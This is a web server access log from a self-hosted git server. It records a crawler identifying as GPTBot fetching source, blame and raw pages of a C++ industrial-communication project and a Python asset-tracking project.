"https://git.hanmocnn.co.kr/windpacer/windpacer/blame/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" -[17/Feb/2026:15:37:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 6463] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" -[17/Feb/2026:15:37:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 21619] [Gzip 28.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" -[17/Feb/2026:15:37:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 10212] [Gzip 3.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" -[17/Feb/2026:15:37:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 9947] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" -[17/Feb/2026:15:37:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 15410] [Gzip 8.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" -[17/Feb/2026:15:37:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 16770] [Gzip 7.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" -[17/Feb/2026:15:37:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 9959] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" -[17/Feb/2026:15:37:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 6268] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" -[17/Feb/2026:15:37:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 6463] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" -[17/Feb/2026:15:37:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 9944] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" -[17/Feb/2026:15:37:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 10794] [Gzip 3.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" -[17/Feb/2026:15:37:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 422] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" -[17/Feb/2026:15:37:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/include/data_format.hpp" [Client 74.7.227.38] [Length 11293] [Gzip 4.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/include/data_format.hpp" -[17/Feb/2026:15:37:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include/app_init.hpp" [Client 74.7.227.38] [Length 9988] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include/app_init.hpp" -[17/Feb/2026:15:37:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/3.31.10" [Client 74.7.227.38] [Length 10219] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/3.31.10" -[17/Feb/2026:15:37:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/app_init.hpp" [Client 74.7.227.38] [Length 9990] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/app_init.hpp" -[17/Feb/2026:15:37:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/app_init.hpp" [Client 74.7.227.38] [Length 10447] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/app_init.hpp" -[17/Feb/2026:15:37:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include/app_init.hpp" [Client 74.7.227.38] [Length 10446] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include/app_init.hpp" -[17/Feb/2026:15:37:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/app_init.hpp" [Client 74.7.227.38] [Length 94] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/app_init.hpp" -[17/Feb/2026:15:37:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/include/data_format.hpp" [Client 74.7.227.38] [Length 546] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/include/data_format.hpp" -[17/Feb/2026:15:37:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include/app_init.hpp" [Client 74.7.227.38] [Length 11398] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include" -[17/Feb/2026:15:37:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/cpp/include/data_format.hpp" [Client 74.7.227.38] [Length 546] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/cpp/include/data_format.hpp" -[17/Feb/2026:15:37:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/cpp/include/data_format.hpp" [Client 74.7.227.38] [Length 12046] [Gzip 3.42] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/cpp/include" -[17/Feb/2026:15:37:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" [Client 74.7.227.38] [Length 13335] [Gzip 4.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include" -[17/Feb/2026:15:37:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/log_macros.hpp" [Client 74.7.227.38] [Length 11598] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include" -[17/Feb/2026:15:37:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include/app_init.hpp" [Client 74.7.227.38] [Length 94] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include/app_init.hpp" -[17/Feb/2026:15:37:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include/app_init.hpp" [Client 74.7.227.38] [Length 94] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include/app_init.hpp" -[17/Feb/2026:15:37:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" [Client 74.7.227.38] [Length 879] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" -[17/Feb/2026:15:37:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include/app_init.hpp" [Client 74.7.227.38] [Length 11397] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include" -[17/Feb/2026:15:37:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/cpp/include/data_format.hpp" [Client 74.7.227.38] [Length 546] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/cpp/include/data_format.hpp" -[17/Feb/2026:15:37:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" [Client 74.7.227.38] [Length 13336] [Gzip 4.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include" -[17/Feb/2026:15:37:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include/app_init.hpp" [Client 74.7.227.38] [Length 94] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include/app_init.hpp" -[17/Feb/2026:15:37:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include/log_macros.hpp" [Client 74.7.227.38] [Length 11599] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include" -[17/Feb/2026:15:37:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/cpp/include/data_format.hpp" [Client 74.7.227.38] [Length 546] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/cpp/include/data_format.hpp" -[17/Feb/2026:15:37:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" [Client 74.7.227.38] [Length 13925] [Gzip 7.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" -[17/Feb/2026:15:37:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/log_macros.hpp" [Client 74.7.227.38] [Length 10685] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/log_macros.hpp" -[17/Feb/2026:15:37:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" [Client 74.7.227.38] [Length 1524] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" -[17/Feb/2026:15:37:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/log_macros.hpp" [Client 74.7.227.38] [Length 366] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/log_macros.hpp" -[17/Feb/2026:15:37:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/.TemporaryDocument/asset_pilot_docker.tar.gz?display=rendered" [Client 74.7.227.38] [Length 10911] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/.TemporaryDocument/asset_pilot_docker.tar.gz" -[17/Feb/2026:15:37:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include/app_init.hpp" [Client 74.7.227.38] [Length 94] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include/app_init.hpp" -[17/Feb/2026:15:38:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/app/fetcher.py?display=rendered" [Client 74.7.227.38] [Length 10948] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/app/fetcher.py" -[17/Feb/2026:15:38:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" [Client 74.7.227.38] [Length 13925] [Gzip 7.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" -[17/Feb/2026:15:38:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" [Client 74.7.227.38] [Length 1524] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" -[17/Feb/2026:15:38:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include/log_macros.hpp" [Client 74.7.227.38] [Length 10684] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include/log_macros.hpp" -[17/Feb/2026:15:38:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include/log_macros.hpp" [Client 74.7.227.38] [Length 366] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include/log_macros.hpp" -[17/Feb/2026:15:38:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/app/calculator.py?display=source" [Client 74.7.227.38] [Length 13104] [Gzip 4.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/app/calculator.py" -[17/Feb/2026:15:38:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/.TemporaryDocument/QUICKSTART.md?display=rendered" [Client 74.7.227.38] [Length 12775] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/.TemporaryDocument/QUICKSTART.md" -[17/Feb/2026:15:38:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr 